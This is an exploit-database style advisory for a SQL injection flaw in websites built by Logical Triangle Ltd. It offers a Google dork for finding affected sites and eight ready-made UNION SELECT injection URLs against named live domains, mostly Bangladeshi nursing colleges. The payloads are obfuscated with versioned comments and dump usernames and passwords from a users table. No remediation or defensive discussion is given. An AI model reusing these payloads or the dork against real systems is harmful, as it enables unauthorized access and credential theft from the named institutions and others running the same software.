*********************************************************
#Exploit Title: Logical Triangle Ltd - Sql Injection Vulnerability
#Date: 2022-03-02
#Exploit Author: Behrouz Mansoori
#Google Dork: "Development by: Logical Triangle Ltd."
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Search google Dork: "Development by: Logical Triangle Ltd."
Admin Page:
target.com/admin
### Demo :
http://www.manikgonjnc.edu.bd/gallery.php?lang=en&cat_id=-39%20/*!12345union*/%20/*!12345select*/%201,/*!12345unhex(hex(group_concat(username,0x3a,pass_word,0x3a,password)))*/,3,4,5,6,7,8,9%20/*!12345from*/%20users--
http://dgnm.logicaltriangle.co/notice_details.php?lang=en¬ic_id=-39%20/*!12345union*/%20/*!12345select*/%201,/*!12345unhex(hex(group_concat(username,0x3a,pass_word,0x3a,password)))*/,3,4,5,6,7,8,9%20/*!12345from*/%20users--
http://www.chattagramnc.edu.bd/gallery.php?lang=en&cat_id=-39%20/*!12345union*/%20/*!12345select*/%201,/*!12345unhex(hex(group_concat(username,0x3a,pass_word,0x3a,password)))*/,3,4,5,6,7,8,9%20/*!12345from*/%20users--
http://dhakanc.edu.bd/latest-news.php?lang=en&news_id=-39%20/*!12345union*/%20/*!12345select*/%201,/*!12345unhex(hex(group_concat(username,0x3a,pass_word,0x3a,password)))*/,3,4,5,6,7,8,9%20/*!12345from*/%20users--
http://www.consbn.edu.bd/gallery.php?lang=en&cat_id=39%20/*!12345union*/%20/*!12345select*/%201,/*!12345unhex(hex(group_concat(username,0x3a,pass_word,0x3a,password)))*/,3,4,5,6,7,8,9%20/*!12345from*/%20users--
http://www.dinajpurnc.edu.bd/gallery.php?lang=en&cat_id=-39%20/*!12345union*/%20/*!12345select*/%201,/*!12345unhex(hex(group_concat(username,0x3a,pass_word,0x3a,password)))*/,3,4,5,6,7,8,9%20/*!12345from*/%20users--
http://www.mymenshinghnc.edu.bd/gallery.php?lang=en&cat_id=-39%20/*!12345union*/%20/*!12345select*/%201,/*!12345unhex(hex(group_concat(username,0x3a,pass_word,0x3a,password)))*/,3,4,5,6,7,8,9%20/*!12345from*/%20users--
http://www.sylhetnc.edu.bd/gallery.php?lang=en&cat_id=-39%20/*!12345union*/%20/*!12345select*/%201,/*!12345unhex(hex(group_concat(username,0x3a,pass_word,0x3a,password)))*/,3,4,5,6,7,8,9%20/*!12345from*/%20users--
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************
